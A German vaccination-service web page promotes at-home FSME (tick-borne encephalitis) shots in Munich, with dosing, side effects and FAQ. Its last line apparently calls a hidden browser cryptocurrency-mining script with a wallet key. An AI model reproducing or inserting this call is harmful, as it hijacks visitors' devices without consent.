fbpx

FSME-Impfung

Zum Schutz für alle Outdoor-Fans im FSME-Risikogebieten gegen die Gefahr einer Gehirnentzündung

Entzündung der 
Gehirnhaut vermeiden

Gesund verreisen – gesund nach Hause kommen.

Einfach und bequem, 
eben zuhause

Sorgenfrei die
 Natur genießen

Jetzt Schutz vor FSME vereinbaren.

Lassen Sie sich bequem zuhause oder in einer Partnerpraxis impfen.

So einfach funktioniert die Reiseimpfung zuhause!

Mit unserem mobilen Impfservice entscheiden Sie sich für die clevere Kombination von digital gestützter Organisation und ärztlichem Hausbesuch – ganz einfach in 3 Schritten:

Alternativ können Sie auch in einer unserer Partnerpraxen in Ihrer Region geimpft werden und können auch hier viel Wartezeit sparen. 

Vimeo

Mit dem Laden des Videos akzeptieren Sie die Datenschutzerklärung von Vimeo.
Mehr erfahren

Video laden

Informieren Sie sich auf unserem Portal meisterdoc.com/reiseimpfung – für eine erste Einschätzung Ihres Impfbedarfs.

Buchen Sie Ihren Wunschtermin für Ihre Reiseimpfung zuhause oder einer unserer Partnerpraxen in Ihrer Region einfach online.

Einer/eine unserer Impfärzte/innen impft Sie nach einer persönlichen Beratung bequem bei Ihnen zuhause oder in einer unserer Partnerpraxen.

Warum vor FSME schützen?​

Sie haben noch Fragen?

Gerne können Sie uns anrufen oder uns schreiben. So können wir in einem unverbindlichen Vorgespräch Ihre Bedenken besprechen. Diese stimmen wir intern mit dem Ärzteteam ab, um Ihnen die richtige Empfehlung aussprechen zu können.

Eine Gehirnentzündung ist vermeidbar.

Das sagen andere Kunden

Lesen Sie hier, wie andere Kundinnen und Kunden unsere Leistung bewerten. Ihre Meinung ist uns wichtig! Erzählen auch Sie uns von Ihren Erfahrungen mit meisterdoc.com/reiseimpfung.

Alexander Pösch
Alexander Pösch
München
Weiterlesen
Spart eine Menge Zeit, das ist es mir wert. Ich schaffe es zu den normalen Öffnungszeiten nur schwierig zum Arzt, weil ich viel arbeite. Also habe ich die Impfungen am Wochenende erledigt, ohne Stress.
Eva Kvoacs
Eva Kvoacs
München
Weiterlesen
Bei uns hat sich gleich die ganze Familie auf einmal impfen lassen. War ganz unkompliziert. Und der Arzt hat sich wirklich Zeit genommen für unsere Fragen.
Maria Huber
Maria Huber
München
Weiterlesen
Es ist genauso unkompliziert wie Essen bestellen. Eine wunderbare Sache. Endlich muss ich die ganze Familie nicht mehr zum Arzt schleppen, weil der Arzt einfach herkommt.
Voriger
Nächster

Gut zu wissen

Die Impfung gegen FSME enthält abgetötete FSME-Viren, die in den Oberarm gespritzt werden.

Die unschädlich gemachten Erreger können die Krankheit nicht auslösen, aber sie reichen aus, um das Immunsystem zu schulen. Es reagiert und bildet Antikörper gegen das Virus.

Das Immungedächtnis braucht jedoch ab und zu Erinnerungshilfen. Das erledigen die Auffrischimpfungen, denn die halten die Gedächtniszellen frisch

Sollte jetzt eine Zecke zubeißen und das Virus übertragen, erkennt unser Immunsystem den Eindringling und macht mit den vorhandenen Antikörpern das Virus unschädlich.

Nach jeder Impfung kann es zu Immunreaktionen kommen. Das macht sich manchmal durcherhöhte Temperatur, Kopfschmerzen, Unwohlsein oder Übelkeit bemerkbar. Vorübergehend kann es auch zur Rötung, Schwellung und zu Schmerzen an der Einstichstelle kommen. 15 Prozent der Kinder und Jugendlichen reagieren auf die Impfung mit leichtem Fieber. 

Wenn Sie Bedenken wegen möglicher Unverträglichkeiten haben, lassen Sie sich von einem unserer Ärzte beraten!

Je mehr Sie sich in der Natur aufhalten – und dazu gehört auch der eigene Garten –, desto höher ist die Wahrscheinlichkeit einer Infektion. Für Reisende in Risikogebiete, die sich gern in der Natur aufhalten, besonders Camper, Wanderer und Sportler, kann die Impfung ebenfalls sehr sinnvoll sein. 

Die Impfung wird mit zunehmendem Alter wichtiger, denn je schwächer das Immunsystem, umso wahrscheinlicher werden schwerere Verläufe bei einer Infektion. Dennoch kann die Impfung auch Kindern ab 12 Monaten verabreicht werden. 

Die Halter von Haustieren wie Hunden und Katzen sind ebenfalls betroffen, denn die geliebten Vierbeiner tragen die Zecken möglicherweise sogar ins Haus. 

Informieren Sie sich rechtzeitig vor Ihrer Reise, ob Sie in ein Risikogebiet unterwegs sind.

Die Impfung kann bei Babys bis zum vollendeten 1. Lebensjahr nicht durchgeführt werden.

Erst nach dem 1. Geburtstag kann die Impfung auch Kleinkindern verabreicht werden. 

Die Ständige Impfkommission (STIKO) empfiehlt Kindern eine Impfung, wenn sie in  Risikogebieten leben und dem Risiko von Zeckenbissen ausgesetzt sind. 

Für eine Impfung werden dann eigens für Kinder entwickelte FSME-Impfstoffe verwendet.

Kinder können nach ihrem 1. Geburtstag eine FSME-Impfung erhalten. Für Kinder, die in Risikogebieten leben und dem Risiko eines Zeckenbisses ausgesetzt sind, gilt eine Impfempfehlung der Ständigen Impfkommission (STIKO), auch wenn die FSME im Kindesalter selten so schwere Verläufe auslöst wie bei Erwachsenen. 

Doch weil sich Kinder meist viel mehr in der Natur aufhalten als Erwachsene, ist auch das Risiko eines Zeckenbisses höher. 

Da die FSME im Erwachsenenalter und besonders in späteren Jahren zu schweren Verläufen führen kann, ist eine Impfung sinnvoll. Leben Sie in einem Risikogebiet oder planen sie dort einen Outdoor-Urlaub? Dann gilt die Impfempfehlung der Ständigen Impfkommission (STIKO) auch Ihnen.

  •  Zum Erhalt der Schutzwirkung Auffrischung nach 3 bis 5 Jahren empfohlen
  • Ab 60 Jahren: Auffrischung generell bereits alle 3 Jahre empfohlen

 

  1. Impfung: Tag 0
  2. Impfung: bringt bereits 95 Prozent Schutzwirkung. Sie erfolgt 1 bis 3 Monate nach der erster Impfung
  3. Impfung: nach 5 bis 12 Monaten bringt Schutzwirkung von 3 Jahren und mehr

Dr. Markus Frühwein erklärt FSME

In unserem Arzt-Talk von meisterdoc.com interviewt Claudia Bechstein den Münchner Tropenmediziner Dr. Markus Frühwein über die FSME-Impfung.

YouTube

Mit dem Laden des Videos akzeptieren Sie die Datenschutzerklärung von YouTube.
Mehr erfahren

Video laden

Bitte melden Sie sich zunächst über unsere Buchungssoftware an und füllen Sie dabei den Online-Gesundheitsfragebogen vollständig aus. Zur Anmeldung gelangen Sie über den Button „Mein Termin. Anschließend erarbeitet unser ärztliches Team anhand Ihres Reiseprofils, Ihres persönlichen Profils und Ihrer medizinischen Daten eine Impfempfehlung für Ihre Reise. Diese können Sie einige Tage vor dem von Ihnen gebuchten Impftermin in Ihrem Kundenkonto einsehen. Beim Hausbesuch bespricht der/die Arzt/in Ihre Reise- und Gesundheitsdaten mit Ihnen, berät Sie ausführlich und impft Sie. Darüber hinaus kann er/sie auch Medikamente verschreiben, zum Beispiel gegen Malaria oder die Höhenkrankheit. Schließlich erhalten Sie eine Beratung zu weiteren Krankheiten, die in Zusammenhang mit Ihrer Reise relevant sein können, gegen die es jedoch keine Impfung gibt.

Weitere häufige Fragen finden Sie hier

Der Preis für unsere Leistungen richtet sich zunächst einmal danach, welche Reiseimpfungen Sie benötigen. reiseimpfungzuhause.de berechnet für die Impfungen den identischen Preis, den Ihr/e Hausarzt/in auch berechnen würde. Hinzu kommen die Kosten für die Anfahrt, den Hausbesuch und gegebenenfalls Feiertags- und Wochenend-Zuschläge. Alle Kosten werden gemäß der Gebührenordnung für Ärzte (GoÄ) abgerechnet. Wir bieten auch Sammel-Impftermine, zu denen Sie mehrere Personen anmelden können. So lohnt sich die Hausimpfung umso mehr für Sie! Selbstverständlich wird bei einem Sammeltermin jede/r ganz individuell nach ihrem/seinem Bedarf geimpft. Dies gilt für spezielle Reiseimpfungen genauso wie für die Standard- und Indikationsimpfungen. Mehr dazu lesen Sie hier.

Weitere häufige Fragen finden Sie hier

Damit Sie gut geschützt in Ihre Reise starten, sollten Sie Ihre Impfungen früh genug planen. Wir empfehlen, Ihren ersten Impftermin 2 bis 3 Monate vor Reiseantritt, mindestens aber 4-6 Wochen  zu vereinbaren. So haben Sie genügend Zeit, eventuell notwendige Wiederholungen rechtzeitig vor Ihrer Abreise zu erledigen. Bedenken Sie dabei bitte auch: Bestimmte Impfungen können für manche Reisen sogar Pflicht sein. Ebenfalls zu berücksichtigen gilt es, dass für einige Impfstoffe eine gesetzlich vorgegebene Mindestzeit von der Impfung bis zur Ankunft im Reiseland einzuhalten ist: So muss zum Beispiel die Gelbfieber-Impfung mindestens 10 Tage vor der Einreise in Zielländer erfolgen, in denen dieser Impfschutz verpflichtend ist. Weitere Infos zu den Impfungen finden Sie hier.

Weitere häufige Fragen finden Sie hier

Nach Ihrer vollständigen Anmeldung über unsere Buchungssoftware erhalten Sie auf Wunsch schon bald einen Impftermin, in der Regel frühestens 3 Tage später. Ihren Wunschtermin bestimmen Sie selbst bei der Online-Buchung Ihrer Reiseimpfung. In Notfällen wird unser Service-Team versuchen, einen Eil-Termin für Sie zu ermöglichen. 

Weitere häufige Fragen finden Sie hier

Impfen ja, aber wo?

Sie können einen Impftermin bei Ihrem Hausarzt vereinbaren oder Sie buchen einen Termin über Angebote wie Doctolib.

Für den Raum München können Sie einen Impftermin auch ganz bequem für sich zuhause buchen. Komfortabel, flexibel, zeitsparend. So ersparen Sie sich das Warten auf einen Impftermin, den Weg in eine Praxis, die Zeit in einem Wartezimmer. In Zukunft auch in ganz Deutschland verfügbar! 

Ihr Reisetyp

Die Beantwortung dieser Fragen wirkt sich auf die Empfehlungen zu allen Ländern im Warenkorb aus, ziehen Sie also alle denkbaren Umstände Ihrer Reise in Erwägung.

Merkzettel

Fragen zu unserem Service oder zu einer bestimmten Impfung?

Schreiben Sie uns! Unser medizinisches Team kümmert sich persönlich um Ihr Anliegen und meldet sich gerne bei Ihnen.
EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50);